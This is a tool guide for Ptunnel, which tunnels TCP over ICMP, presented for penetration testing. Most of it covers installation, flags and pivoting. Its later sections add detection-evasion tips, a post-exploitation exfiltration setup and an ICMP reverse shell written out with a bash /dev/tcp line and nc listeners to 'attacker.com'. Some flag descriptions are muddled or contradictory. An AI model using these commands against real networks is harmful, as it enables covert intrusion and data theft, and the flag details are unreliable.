Ptunnel

Overview

Ptunnel (Ping Tunnel) is a sophisticated tunneling utility that encapsulates TCP traffic within ICMP echo request/reply packets (ping). Essential for penetration testing in highly restricted network environments, it enables TCP connections through firewalls that allow ICMP but block standard TCP/UDP traffic. Ptunnel operates invisibly through standard ping activity, making it effective for covert data exfiltration and command execution in locked-down networks.

Installation and Setup

Linux Installation

# Install from repositories
sudo apt-get update
sudo apt-get install -y ptunnel

# Or build from source
git clone https://github.com/royhills/ptunnel.git
cd ptunnel
make clean
make

# Verify installation
ptunnel --version

Build from Source

# Get source code
wget http://www.cs.uit.no/~daniels/PingTunnel/ptunnel-0.72.tar.gz
tar -xzf ptunnel-0.72.tar.gz
cd ptunnel-0.72

# Compile
make
sudo make install

# Verify
ptunnel -h

macOS Installation

# Using Homebrew (if available)
brew install ptunnel

# Or build from source
git clone https://github.com/royhills/ptunnel.git
cd ptunnel
make

# Link to /usr/local/bin
sudo cp ptunnel /usr/local/bin/

Windows Installation

# Download precompiled binary
# From https://www.cs.uit.no/~daniels/PingTunnel/

# Extract and add to PATH
# Place in C:\Windows\System32\ or add directory to PATH

# Verify installation
ptunnel -h

Basic Architecture

Server and Client Roles

CLIENT SIDE                         SERVER SIDE (Gateway)
User App ──┐                              ┌─── Target Service
           │                              │
    TCP:22 │                              │ TCP:22
           ▼                              ▼
[Ptunnel Client] ──ICMP packets──→ [Ptunnel Server] ──TCP──→ Target
           ▲                              ▲
  (Local Port 8022)           (Gateway to External Network)

Basic Syntax

Command	Description
`ptunnel -p gateway.com -l 8022 -r target.com -R 22`	Client tunnel
`ptunnel -x password`	Server with authentication
`ptunnel -h`	Display help information
`sudo ptunnel`	Start server (requires root)

Server-Side Setup

Basic Server

# Start ptunnel server (must run as root)
sudo ptunnel

# Server listens for ICMP tunneling requests
# No additional configuration needed initially

Server with Authentication

# Start server with password protection
sudo ptunnel -x mysecretpassword

# Only clients with matching password can tunnel

Server with Custom Settings

# Server on non-standard interface
sudo ptunnel -s 192.168.1.50

# Listen on specific IP
sudo ptunnel -s gateway.internal.com

# Verbose output for debugging
sudo ptunnel -v

Daemonize Server

# Run ptunnel in background
nohup sudo ptunnel -v &

# Or with systemd
sudo systemctl start ptunnel

# Enable on boot
sudo systemctl enable ptunnel

Server Flag	Description
`-x`	Set authentication password
`-s`	Server/gateway IP address
`-v`	Verbose output
`-c`	Cisco compatibility mode
`-l`	Local protocol (udp, tcp)

Client-Side Setup

Basic Client Tunnel

# Create tunnel to remote server through gateway
ptunnel -p gateway.com -l 8022 -r target.server.com -R 22

# Client listens on local port 8022
# Traffic tunneled to target.server.com:22 via gateway

Client with Authentication

# Connect with password to authenticated server
ptunnel -p gateway.com -x mysecretpassword -l 8022 -r target.server.com -R 22

# Password must match server configuration

Client for Different Ports

# SSH through tunnel
ptunnel -p gateway.com -l 8022 -r target.server.com -R 22

# HTTP through tunnel
ptunnel -p gateway.com -l 8080 -r internal-web.com -R 80

# Multiple tunnels (different local ports)
ptunnel -p gateway.com -l 8022 -r target1.com -R 22 &
ptunnel -p gateway.com -l 8023 -r target2.com -R 22 &
ptunnel -p gateway.com -l 8080 -r internal-web.com -R 80 &

Specify Source IP

# Use specific interface for tunnel
ptunnel -p gateway.com -s 192.168.1.100 -l 8022 -r target.server.com -R 22

# Useful on multi-homed systems

Client Flag	Description
`-p`	Gateway/proxy server
`-l`	Local listen port
`-r`	Remote target server
`-R`	Remote target port
`-s`	Source IP address
`-x`	Server password
`-u`	Unprivileged mode
`-v`	Verbose output

Practical Usage Examples

SSH Through ICMP Tunnel

# Terminal 1: Start server
sudo ptunnel

# Terminal 2: Create client tunnel
ptunnel -p 192.168.1.1 -l 8022 -r internal-server.local -R 22

# Terminal 3: SSH through tunnel
ssh -p 8022 username@127.0.0.1

# Now you have SSH access to internal-server through ICMP

Multiple Service Tunneling

# Start server
sudo ptunnel -x tunnel_password

# Create multiple client tunnels
ptunnel -p gateway.com -x tunnel_password -l 8022 -r db.internal -R 3306 &
ptunnel -p gateway.com -x tunnel_password -l 8080 -r web.internal -R 80 &
ptunnel -p gateway.com -x tunnel_password -l 8443 -r web.internal -R 443 &

# Access services through tunnels
mysql -h 127.0.0.1 -P 8022 -u user
firefox http://127.0.0.1:8080

RDP Tunneling

# Start tunnel
ptunnel -p gateway.com -l 3389 -r rdp-server.internal -R 3389

# Connect via RDP
rdesktop 127.0.0.1:3389
# Or in Windows
mstsc /v:127.0.0.1:3389

VNC Tunneling

# Create tunnel
ptunnel -p gateway.com -l 5900 -r vnc-server.internal -R 5900

# Connect VNC client
vncviewer 127.0.0.1:5900

Advanced Configuration

Scripted Tunnel Management

#!/bin/bash
# ptunnel_manager.sh

GATEWAY="gateway.com"
PASSWORD="tunnel_secret"

# Function to create tunnel
create_tunnel() {
  local name=$1
  local local_port=$2
  local remote_host=$3
  local remote_port=$4
  
  echo "[*] Creating tunnel: $name"
  ptunnel -p "$GATEWAY" -x "$PASSWORD" \
    -l "$local_port" -r "$remote_host" -R "$remote_port" &
  echo $! > "tunnel_$name.pid"
}

# Function to kill tunnel
kill_tunnel() {
  local name=$1
  if [ -f "tunnel_$name.pid" ]; then
    kill $(cat "tunnel_$name.pid")
    rm "tunnel_$name.pid"
    echo "[*] Tunnel $name closed"
  fi
}

# Create multiple tunnels
create_tunnel "ssh" 8022 "internal-ssh.local" 22
create_tunnel "mysql" 3306 "db-server.local" 3306
create_tunnel "http" 8080 "web-server.local" 80

echo "[*] All tunnels created"
sleep infinity

Network Tunneling Chain

# Create chain of tunnels for lateral movement
# Attacker → Gateway (ICMP) → Internal Pivot → Target

# Server at gateway
sudo ptunnel -x pass123

# Client creates tunnel to pivot
ptunnel -p gateway.com -x pass123 -l 9999 -r 192.168.100.50 -R 22

# SSH to pivot through tunnel
ssh -p 9999 pivot_user@127.0.0.1

# From pivot, create second tunnel to target
ptunnel -p 127.0.0.1 -l 8022 -r target.internal -R 22

# Access target through both hops
ssh -p 8022 target_user@127.0.0.1

Performance and Optimization

Monitor Tunnel Performance

# Watch ICMP traffic
sudo tcpdump -i any "icmp and (echo-request or echo-reply)"

# Monitor bandwidth usage
iftop -i eth0

# Check tunnel statistics
netstat -an | grep ESTABLISHED

Optimize for Throughput

# Increase buffer sizes
ptunnel -p gateway.com -l 8022 -r target.com -R 22

# Tunnel over UDP for better performance
ptunnel -p gateway.com -l 8022 -r target.com -R 22 -u

Firewall and Detection Evasion

ICMP Rate Limiting

# Avoid detection by limiting ICMP rate
# Modify client to send slower
ptunnel -p gateway.com -l 8022 -r target.com -R 22 -d 100

# Add delays between packets
(ptunnel -p gateway.com -l 8022 -r target.com -R 22) &
# Monitor and throttle as needed

Obfuscation Techniques

# Tunnel within legitimate traffic
# Mix regular pings with tunnel data
ping -i 60 gateway.com &

# Use tunnel during normal ICMP activity
ptunnel -p gateway.com -l 8022 -r target.com -R 22

Practical Penetration Testing Scenarios

Post-Exploitation Data Exfiltration

# Victim machine (has ICMP out, no TCP)
# Server setup at attacker gateway
sudo ptunnel -x exfil_pass

# From victim (compromised system)
ptunnel -p attacker-gateway.com -x exfil_pass -l 9999 -r attacker.com -R 4444

# Attacker receives data
nc -lvnp 4444 > exfiltrated_data.bin

Reverse Shell via ICMP

# Attacker: start server
sudo ptunnel -x shell_pass

# Attacker: listener on normal port
nc -lvnp 5555

# Victim: create tunnel back
ptunnel -p attacker.com -x shell_pass -l 6666 -r attacker.com -R 5555

# Victim: connect back
/bin/bash -i >& /dev/tcp/127.0.0.1/6666 0>&1

Internal Network Reconnaissance

# Attacker tunnel
ptunnel -p gateway.com -l 8022 -r pivot-point.internal -R 22

# Lateral movement from pivot
ssh -p 8022 pivot@127.0.0.1

# From pivot, scan internal network
nmap -sV 192.168.100.0/24

# Results exfiltrated via tunnel

Troubleshooting

Connection Issues

# Check ICMP connectivity
ping -c 5 gateway.com

# Verify server is running
sudo netstat -an | grep "icmp"

# Enable verbose on both sides
sudo ptunnel -v
ptunnel -p gateway.com -l 8022 -r target.com -R 22 -v

Authentication Failures

# Test password
ptunnel -p gateway.com -x test_password -v

# Ensure server and client passwords match
# Server: sudo ptunnel -x mypass
# Client: ptunnel -p gateway.com -x mypass ...

Performance Issues

# Check network latency
ping -c 10 gateway.com

# Monitor tunnel with tcpdump
sudo tcpdump -i any "icmp" -n

# Check for packet loss
ping -c 100 gateway.com | grep "loss"

Security Best Practices

Authorization: Only tunnel through authorized gateways
Passwords: Use strong authentication passwords
Logging: Enable verbose mode for forensic review
Monitoring: Monitor for ICMP-based tunnel activity
Network Policy: Establish clear policies on ICMP usage
Detection: Be aware ICMP tunneling may trigger IDS alerts
Compliance: Ensure activity complies with security policy
Documentation: Document all tunnel operations

Flag Reference

Flag	Description
`-p`	Gateway/proxy server hostname
`-l`	Local listen port number
`-r`	Remote target server hostname
`-R`	Remote target port number
`-s`	Source IP address
`-x`	Authentication password
`-u`	Unprivileged mode
`-v`	Verbose debugging output
`-c`	Cisco compatibility mode
`-d`	Delay between packets
`-h`	Help information

socat — Relay and tunneling utility
Chisel — Fast TCP/UDP tunneling
stunnel — SSL/TLS tunneling proxy
Ligolo-ng — Advanced tunneling framework
SSH Tunneling — Native SSH port forwarding
Proxytunnel — HTTP proxy tunneling
WireGuard — Modern VPN alternative